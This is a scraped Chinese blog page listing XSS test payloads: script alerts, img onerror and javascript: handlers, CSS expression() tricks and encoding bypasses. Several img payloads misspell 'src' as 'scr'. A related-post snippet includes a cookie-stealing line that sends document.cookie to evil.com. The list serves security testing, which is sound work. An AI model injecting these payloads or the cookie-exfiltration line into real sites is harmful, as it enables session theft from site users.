xss测试用例小结

最新推荐文章于 2023-04-12 20:46:13 发布
转载 最新推荐文章于 2023-04-12 20:46:13 发布 · 224 阅读 · 1
文章标签:

#测试 #javascript #ViewUI

本文列举了多种跨站脚本(XSS)攻击的具体实现方式,包括使用不同类型的标签和属性来触发警告消息,展示了攻击者如何利用这些手段注入恶意脚本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<script>alert("跨站")</script> (最常用)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">[/post]

 

SXU—软件测试方法和技术-朱少民-第二部分 所有测试汇总 整理最重要内容-附考点 相关习题及解答
weixin_63597914的博客
02-29 1572
SXU—软件测试方法和技术-朱少民-测试大汇总—软件缺陷,软件测试(静态动态、主被动、黑白盒、单元集成系统功能测试等)附考点 相关习题及解答
xss测试用例
liu_xp_mother的博客
07-11 7618
1. alert(1); 2.alert('xss'); 3. 4.location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)" 5.ipt>alert('xss');ipt> 6. 7.@im\port'\ja\vasc\ript:alert(\"xss\")'; 8.alert(\
XSS测试用例
q908544703的博客
05-28 2227
下载原件地址:链接:https://pan.baidu.com/s/1HQu4daTdxfgTDWAyXUD5lA 提取码:5mw1 在这里插入图片描述
XSS的漏洞测试案例
weixin_51446936的博客
06-01 2429
1、获取cookie的原理和实验演示 《get型xss》 第一步:搭建xss的后台 打开pikachu xss的后台管理工具(在pikachu漏洞平台底部---->管理工具----->xss后台) 根据提示进行安装,修改配置文件,即数据库的账户和密码 接下来,根据提示进行安装/初始化,然后进行登录 后台登录成功 现在xss后台没有任何数据 第二步:先将pikachu中cookie.php改为自己本地的ip,重定向到一个可信的网站,我的ip如下 路径为:D:\phpstudy2018\P
安全测试xss攻击通用测试用例
测试开发
04-12 1437
安全测试,测xss攻击,一个通用case测出一类问题。测试开发同学可以关注一下
【TBB测试用例设计的黑盒秘技】:黑盒测试在TBB中的高级应用
随着软件测试技术的不断进步,测试用例的设计与实施已经成为了确保软件质量和性能的关键环节。本文首先介绍测试用例设计的理论基础,并对黑盒测试技术进行深入分析,涵盖了测试方法论、实践技巧和缺陷定位。随后,...
【Layui单元测试:编写与维护表格事件监听的测试用例】:确保你的Layui应用稳定可靠
文章首先介绍了Layui表格事件监听的基本概念和测试用例编写的理论基础,接着详细探讨了编写和运行测试用例的具体方法和步骤。此外,本文还深入分析了测试用例的维护、优化以及自动化测试实践、性能测试与优化、安全...
软件测试知识体系图谱
weixin_50552058的博客
07-07 5492
软件测试基础图谱
软件测试
weixin_44093711的博客
01-09 2191
软件测试工具 软件测试工具分为性能测试工具、自动化软件测试工具和测试管理工具。性能测试工具、自动化软件测试工具存在的价值是为了提高测试效率,用软件来代替一些人工输入。测试管理工具是为了复用测试用例,提高软件测试的价值,更好的管理测试过程。一个好的软件测试工具和测试管理工具结合起来使用将会使软件测试效率大大的提高。 工具分类 测试管理工具 TestDirector(大而全) jira(简单好用) Quality Center(复杂,收费) 禅道(简单好用) bugzilla(功能简单) svn(代码和文档管理
SQL注入用例及XSS用例
05-05
安全测试,SQL注入方面的用例及XSS的操作用例
xss测试案例
仅做个人笔记
12-10 374
<img/src=1 onerror=(alert)(2233)> "><img/src=1 onerror=(alert)(2233)> <script>alert(2233)</script> "><script>alert(2233)</script>
Web安全之XSS
至尊宝猴哥
02-16 503
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。 作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。  阅读目录XSS
xss攻击汇总
continue my dream
09-04 3042
(1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签无分号无引号 (4)IMG标签大小写不敏感 (5)HTML编码(必须有分号) (6)修正缺陷IMG标签 alert("XSS")"> (7)formCharCode标签(计算器) (8)UTF-8的Unicode编码(计算器) (9)7位的
【3】Web端XSS安全测试
u012914863的博客
09-14 412
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。 作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。 阅读目录 ...
XSS类型概述及示范用例
NZXHJ的博客
07-24 929
XSS类型概述及不同情况下示范用例
PHP网页xss攻击测试用例,Web安全测试 | xss攻击
weixin_29357243的博客
03-22 574
xss攻击的全称是Cross-Site Scripting (XSS)攻击,是一种注入式攻击。基本的做法是把恶意代码注入到目标网站。由于浏览器在打开目标网站的时候并不知道哪些脚本是恶意的,所以浏览器会无差别执行恶意脚本,从而导致用户信息和一些敏感信息被盗取和泄漏。xss一般分为两种类型,持久化的xss和非持久化的xss。持久化xss下面这个例子演示了攻击者如何通过注入恶意代码去盗取用户的cooki...
XSS总结
weixin_43263451的博客
08-03 894
XSS总结简介跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 分类反射型XSS反射型只是简单的将用户输入的数据”反射”给浏览器,...
机票信息管理系统测试用例详解
在IT行业中,测试用例是确保软件系统能够按照预期工作的关键组成部分。尤其是对于像机票信息管理系统这样的复杂系统,详尽的测试用例可以确保系统的稳定运行、数据的准确性以及用户交互的流畅性。在本篇知识输出中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值